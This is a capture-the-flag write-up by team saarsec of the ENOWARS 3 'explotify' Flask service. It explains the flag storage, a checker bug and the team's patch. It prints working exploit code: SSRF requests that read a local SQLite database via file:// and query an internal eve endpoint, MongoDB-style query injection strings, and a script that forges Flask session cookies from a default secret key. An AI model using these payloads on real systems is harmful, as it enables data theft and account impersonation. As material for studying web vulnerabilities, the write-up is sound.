ENOWARS 3 WriteUp explotify

10 July 2019 by Ben, Johannes & Olli

Service Overview

The service itself was a Flask Python service. The intended functionality allowed a registered user to generate songs based on given lyrics and (optionally) an MP3 file. If no MP3 was provided, the service would just use a default one, prepend the “lyrics” and output the file. For storage, the service used two different backends: for users, it used a SQLite database at /app/explotify_db/explotify.db (storing username, password, first and last name, and mobile number), and a MongoDB to store information about generated songs (notably, the SQLite database also contained a table song, which was not used though). Instead of directly accessing the MongoDB instance, which was running in a different Docker container (explotify_db), it was accessed via an HTTP interface in yet another Docker container (db_engine_explotify). Specifically, db_engine_explotify ran a REST endpoint (using the eve library), configured to allow access to the songs collection of the MongoDB.

Flag Storage

Since we did not write the gameserver scripts, we can only guess where flags were supposed to be stored based on the traffic we received. However, there seemed to be a good reason for those places to store flags, so we are confident that we understood what the checker wanted to do (we discuss snafus later on).

Flags in mobile phone number

When registering, the gameserver would provide the flag as the mobile number for that account. Interestingly, we saw that while the gameserver then logged in as the user, no other action was taken. To later on retrieve that flag, the gameserver logged in with the created account, and then accessed the /user/me endpoint, which would (securely) query the SQLite database for information for the account and return this as JSON.

Flags in song name

The alternative way of storing flags, which was only used for a few rounds in the CTF, was to register an account in the system and then upload a song, where the song name was the flag. This was buggy: in the beginning the gameserver did try to post a new song, but did not specify lyrics or a song name, so nothing was stored. This was not the only bug in the checker, though. The second one, which was quite destructive (as we discuss later), was that when this type of flag was being set, the mobile phone number was supposed to be generated randomly, namely by a function generate_random_string defined in the class checker.ExplotifyChecker. Now one may wonder: how can we know this?!

The answer is as follows: instead of actually calling the function, the gameserver script initially must have had something such as

    data = {"username": "....",
            "mobile_number": self.generate_random_string}

Hence, instead of calling the function and getting the result, this merely yielded a string such as <bound+method+ExplotifyChecker.generate_random_string+of+<checker.ExplotifyChecker+object+at+0x7fb86024f940>>, which is the string representation of the member function of that class/object. We found that this bug was actually in the checker until at least 15:15 (CEST), as all the traffic not carrying a flag in the phone number contained this as the “phone number”.
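The effect is easy to reproduce. The following is a minimal sketch, not the actual checker code: the class body and the placeholder return value are assumptions, and only the class and method names are taken from the traffic above. It form-encodes the data once with the method object and once with the method's result.

```python
from urllib.parse import urlencode


class ExplotifyChecker:
    """Hypothetical stand-in for the gameserver's checker class."""

    def generate_random_string(self):
        # Placeholder value; the real checker presumably returned random characters.
        return "0123456789"


checker = ExplotifyChecker()

# Bug: the bound method itself is passed, so str() of the method is encoded.
buggy = urlencode({"mobile_number": checker.generate_random_string})

# Fix: call the method and encode its return value.
fixed = urlencode({"mobile_number": checker.generate_random_string()})

print(buggy)
print(fixed)
```

The first line printed contains the form-encoded representation of the bound method (including the object's memory address), the second the intended value.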

Sadly, according to our traffic, flags of this type were only stored between 13:07 and 13:30 (for that period of time, the bug with the random string was seemingly fixed).

Flaws in the service

This service had quite a number of bugs, most of which unfortunately did not help at all due to the broken checkers.

Server-Side Request Forgery

The first thing you notice, even without looking at the code and just from the UI, is that if you are not feeling very creative, you can have the server download the lyrics from elsewhere. This screamed Server-Side Request Forgery to us, meaning that we can make the server download a file for us. This type of attack is particularly useful, as it usually enables you to read data from internal servers, or even from the local filesystem.

Looking through the actual code, we find that if a URL is provided, the following code is invoked. Essentially, the internal function __visit_website_from_link is called, which uses urllib.request to retrieve a URL and return its content. Subsequently, the downloaded content is checked to determine whether it is HTML or not. This check, which is shown at the end of the excerpt, just uses BeautifulSoup to figure out if there are any tags; if so, the content is deemed to be HTML. Then, depending on whether the content seems to be HTML or not, the content is decoded (note that if it is HTML, there is no "ignore" as the second parameter to the invocation of decode!) and returned as base64.

    # services_app/lyrics_generator_service.py from line 48
    def generate_lyrics_from_website(self,website):
        info_website = self.__visit_website_from_link(website)
        test_html = self.__is_html(info_website)
        if test_html:
            decoded_info_website = info_website.decode("utf-8")
            paragraphs = self.__get_paragraphs_from_html(decoded_info_website)
            text = self.__join_paragraphs(paragraphs)
            random_word = self.__generate_random_lyrics(text)
            return base64.b64encode(info_website),random_word,True
        else:
            try:
                decoded_info_website = info_website.decode("utf-8","ignore")
                text = self.__generate_random_lyrics(decoded_info_website)
                return base64.b64encode(info_website),text,True
            except:
                text = self.__generate_from_default_model()
                return base64.b64encode(info_website),text,False

    # services_app/lyrics_generator_service.py from line 77
    def __is_html(self,data):
        test = bool(BeautifulSoup(data, "html.parser").find())
        return test

Stealing the SQLite database

Ok, this seems like a slam dunk and very easy to exploit. Given that urllib can also open a file:// URL, we built the following simple exploit to attack ourselves (even before the CTF had properly started):

    data = {
        'name_song': 'song_' + randomstring(10),
        'web_lyrics': 'true',
        'lyrics': 'file:///app/explotify_db/explotify.db'}

    req = sess.request('POST', 'http://' + target + '/song', data=data, timeout=120,
                       files={'custom_song': open('silence.mp3', 'rb')})

The obvious goal here was to just leak the SQLite database, which contained the phone numbers (we did not know at that point that we’d have to get the phone numbers, but concentrated on just getting the whole database and then regexp-matching for flags). This exploit worked like a charm when we tried it before the network was opened, but failed to work right after.
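The core of the flaw can be tried offline. The sketch below is an illustration under stated assumptions rather than our exploit: the helper names fetch and flags_from_leak, the flag pattern FLAG_RE, and the contents of the fake database file are all hypothetical. It shows urllib reading a local file through a file:// URL and flags being regexp-matched from the base64-encoded result.

```python
import base64
import re
import tempfile
import urllib.request
from pathlib import Path

# Hypothetical flag pattern: "ENO" followed by base64-style characters.
FLAG_RE = re.compile(rb"ENO[A-Za-z0-9+/=]{8,}")


def fetch(url):
    """Fetch a URL the way a naive downloader would; file:// works too."""
    with urllib.request.urlopen(url) as resp:
        return resp.read()


def flags_from_leak(b64_blob):
    """Decode the base64 blob and return everything that looks like a flag."""
    return FLAG_RE.findall(base64.b64decode(b64_blob))


with tempfile.TemporaryDirectory() as tmp:
    # Fake "database" with binary junk around a made-up flag.
    db = Path(tmp) / "explotify.db"
    db.write_bytes(b"SQLite format 3\x00\xf8\x01 ENOdGVzdGZsYWc= \x00 more")
    leaked = base64.b64encode(fetch(db.as_uri()))

found = flags_from_leak(leaked)
print(found)
```

Matching on the raw bytes avoids any decoding step on the attacker's side, so binary content in the leaked file does not matter there.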

How the checker script screwed up the flaw

Two minor things ended up being the recipe for disaster (or unexploitability ;)) here. First, the difference in handling HTML vs. non-HTML. A SQLite database is a binary format, which contains bytes like 0xF8. In UTF-8 such bytes are not plain characters: 0xF8 looks like the lead byte of a multi-byte sequence, and the bytes following it in the database did not form a valid UTF-8 character. Therefore, the call to decode in the HTML branch above (the one without the additional "ignore" parameter for how to handle errors) would fail if the database were to be detected as HTML. But then again, why would it, given the fact that it only stored user info?

Here the mentioned snafu of generating random strings comes into play. As the string representation of the function contains < and >, BeautifulSoup is able to find tags, meaning it classifies a SQLite database that contains said string as HTML, essentially breaking the exploitability. This was pretty disappointing; yet, we still managed to steal flags from five teams with this exploit, merely because they must have reset their Docker image of the service at some point after the buggy checker was fixed, so their databases did not contain “HTML” anymore. We also would like to thank team UlisseLabBO, who apparently joined the game only after the checker had been fixed, which meant that their database remained “stealable” for the rest of the game.
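The interplay of the two issues can be sketched offline. This is an approximation under assumptions, not the service code: looks_like_html uses the standard library's html.parser as a stand-in for the BeautifulSoup check, decode_like_service only mirrors the strict vs. "ignore" decoding of the two branches, and the database contents are made up.

```python
from html.parser import HTMLParser


class TagSpotter(HTMLParser):
    """Records every start tag the parser recognises."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def looks_like_html(data):
    # Stand-in for __is_html; bytes are decoded leniently only to feed the stdlib parser.
    spotter = TagSpotter()
    spotter.feed(data.decode("utf-8", "ignore"))
    spotter.close()
    return bool(spotter.tags)


def decode_like_service(data):
    if looks_like_html(data):
        return data.decode("utf-8")        # HTML branch: strict decoding
    return data.decode("utf-8", "ignore")  # non-HTML branch: invalid bytes dropped


BOUND = (b"<bound method ExplotifyChecker.generate_random_string of "
         b"<checker.ExplotifyChecker object at 0x7fb86024f940>>")
clean_db = b"SQLite format 3\x00\xf8\x01alice ENOflagflag"  # made-up content
poisoned_db = clean_db + BOUND

print(looks_like_html(clean_db), looks_like_html(poisoned_db))
try:
    decode_like_service(poisoned_db)
except UnicodeDecodeError as err:
    print("poisoned database cannot be leaked:", err.reason)
```

In this sketch the clean database decodes fine, while the one containing the bound-method string is treated as HTML and then fails in the strict decode.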

Directly requesting data from the eve endpoint

As mentioned, the service used an eve service, reachable via HTTP in a different container, to store and retrieve songs (and hence the flags in song names). Since we had an SSRF flaw in Explotify, abusing this was quite straightforward.

    data = {
        'name_song': 'song_' + randomstring(10),
        'web_lyrics': 'true',
        'lyrics': 'http://db_engine_explotify:80/songs?sort=-_created'}

    req = sess.request('POST', 'http://' + target + '/song', data=data, timeout=120,
                       files={'custom_song': open('silence.mp3', 'rb')})

This would have allowed us to steal all the flags stored in MongoDB, in particular in descending insertion order. Unfortunately, this did not really yield too many flags, as at some point the checker just stopped handing out flags to be stored in the song names.
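Once such a response has been leaked, pulling out the interesting fields is simple. The sketch below assumes that the leaked base64 blob wraps the eve JSON response unchanged; the helper name songs_from_leak and the sample document are hypothetical, while the field names _items, _meta, username and name_song are the ones used by the service code.

```python
import base64
import json


def songs_from_leak(b64_blob):
    """Return (username, name_song) pairs from a leaked eve response."""
    doc = json.loads(base64.b64decode(b64_blob))
    return [(item.get("username"), item.get("name_song"))
            for item in doc.get("_items", [])]


# Made-up response in the shape the service code expects from eve.
sample = base64.b64encode(json.dumps({
    "_items": [
        {"username": "alice", "name_song": "ENOexampleflag", "hash_id": "abc"},
        {"username": "bob", "name_song": "some song", "hash_id": "def"},
    ],
    "_meta": {"total": 2},
}).encode())

pairs = songs_from_leak(sample)
print(pairs)
```

The usernames obtained this way are also what a cookie-forging attack against /user/me would need as input.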

Our patch

The straightforward fix we applied was to ensure that the URL of the website did not start with file:// (to avoid the local file read) and did not contain explotify. This would theoretically still have allowed other teams to access the endpoint via its IP address, but it does not seem as if anyone went as far as that ;-)
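A minimal sketch of such a filter, assuming a helper named is_allowed_url (a hypothetical name; this is not the literal patch we deployed) and a made-up internal IP address for the bypass:

```python
def is_allowed_url(url):
    """Reject local file reads and anything naming the explotify containers."""
    if url.startswith("file://"):
        return False
    if "explotify" in url:
        return False
    return True


print(is_allowed_url("file:///app/explotify_db/explotify.db"))              # False
print(is_allowed_url("http://db_engine_explotify:80/songs?sort=-_created"))  # False
print(is_allowed_url("http://172.18.0.3:80/songs?sort=-_created"))           # True: IP bypass
```

A blocklist like this is deliberately simple; an allowlist of permitted schemes and resolved addresses would be the more robust design, at the cost of more code to get right during a CTF.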

Eve “injection” in search function and username

Apart from abusing the SSRF flaw to extract data from the eve endpoint, there were also two options to “inject” commands into the eve endpoint. In particular, contrary to MongoDB, which for the query db.songs.find({"username": "foo", "username": "bar"}) would return no result (as the username would have had to be both foo and bar at the same time), adding a second field with the same name to the Eve search would ignore the first occurrence.

This allowed for two exploits: first, register a user with the name ", "username": {"$ne": 0}}&foo= and then visit the /song URL. This in turn calls the function get_all_songs_by_user(username) from the Song Service. As shown below in line 2, the username is just put into a format string. Given this username, the resulting URL queried from the eve endpoint is /songs?where={"username": "", "username": {"$ne": 0}}&foo="}.

    def get_all_songs_by_user(self,username):
        song_query = f'where={{ "username": "{ username }"}}'
        song_complete_url = self.__song_endpoint + "?" + song_query
        song = requests.get(song_complete_url)
        data_song = song.json()
        
        if data_song["_meta"]["total"] == 0:
            raise SongNotFoundException("The searched object was not found")
    
        song_data = data_song["_items"]

        return song_data

This effectively queries the MongoDB database for all songs of users whose name is not equal to 0; essentially all of them. In the same manner we could also have abused the /song/<string:hash_id> endpoint, which either called get_song_by_id_from_username or get_song_by_hash_from_username. As the exploits are virtually the same, we just focus on get_song_by_hash_from_username here.

    def get_song_by_hash_from_username(self,hash_id,username):
        song_query = f'where={{ "hash_id" :  "{ hash_id }" , "username": "{ username }"}}'
        song_complete_url = self.__song_endpoint + "?" + song_query
        song = requests.get(song_complete_url)
        data_song = song.json()
        # ...

As the hash_id is really just a string controllable by an attacker, we could easily search for ", "hash_id": {"$ne": 0}}&foo= to get the first entry from the database. Since we only ever get a single entry, a more sensible query is as follows: ", "hash_id": {"$ne": 0}, "name_song": {"$gt": "ENO", "$lt": "ENP"}}&sort=-_created&foo=. This makes sure that we match any hash_id and that the name of the song is greater than ENO, but less than ENP (which should hold true for all strings that start with ENO).
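To see what the endpoint ends up with, the query string can be rebuilt and parsed offline. The sketch below reuses the f-string from get_song_by_hash_from_username; the function name build_hash_query and the username attacker are hypothetical, and parsing the where clause with json.loads is an assumption about how the duplicate key is resolved (Python's json module keeps the last value for a repeated key, which matches the behaviour described above).

```python
import json
from urllib.parse import parse_qs


def build_hash_query(hash_id, username):
    # Same format string as in get_song_by_hash_from_username.
    return f'where={{ "hash_id" :  "{ hash_id }" , "username": "{ username }"}}'


payload = ('", "hash_id": {"$ne": 0}, '
           '"name_song": {"$gt": "ENO", "$lt": "ENP"}}&sort=-_created&foo=')
query = build_hash_query(payload, "attacker")

# The injected "&" splits the query string into additional parameters.
params = parse_qs(query)
where = json.loads(params["where"][0])

print(where)           # duplicate "hash_id" key: the last occurrence wins
print(params["sort"])  # injected sort parameter
print("ENO" < "ENOsomeflag" < "ENP")  # the range matches any string starting with ENO
```

Note that the original username restriction ends up in the throwaway foo parameter, so it no longer constrains the query at all.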

We did not actually make use of these in the CTF, mostly because we already had another way to leak song names and only a handful of flags were ever stored there.

Forging cookies

The final piece of the (potential) puzzle could have been to steal the phone numbers from users by forging cookies. In particular, the cookie in Flask is only secured by an HMAC based on a configurable secret key. In the original version of the service, this key was set to "super secret key". Our idea, which worked, but did not yield any flags, was as follows: using the eve database, extract the names of the users that recently uploaded songs (as we expected the gameserver to do, but it never did due to seemingly broken checker scripts). Once we have the name, forge the cookie and request the /user/me endpoint to extract the phone number.

    import requests
    from flask.sessions import session_json_serializer
    from itsdangerous import URLSafeTimedSerializer
    from hashlib import sha1

    # Default secret key shipped with the service
    secret_key = 'super secret key'
    # Same salt, serializer and signer settings that Flask uses for its session cookie
    signer = URLSafeTimedSerializer(secret_key, salt='cookie-session', serializer=session_json_serializer,
                                    signer_kwargs={'key_derivation': 'hmac', 'digest_method': sha1})

    for username in usernames:  # as extracted from the eve endpoint
        json_payload = signer.dumps({"logged_in": True, "user": username})
        print(requests.get('http://' + target + '/user/me', cookies={"session": json_payload}, timeout=5).text)

Assuming that teams would change their secret key, we also thought about stealing the settings file via the SSRF; yet, given that our exploit against teams with the original, old key did not yield any results (as the gameserver did not actually post songs), we did not follow this further.

Summary & Discussion

Overall, this service had a lot of bugs, and you needed to understand how to chain them together. It’s very unfortunate that the checker did not perform that well in the CTF: it a) accidentally broke one flaw by adding a seemingly HTML construct to the database and b) did not upload songs (either to store flags or to just drop the usernames). We will not complain, since we won the CTF, but it would have been great fun to exploit all these bugs for moar flags :-)

saarsec

Schwenk and pwn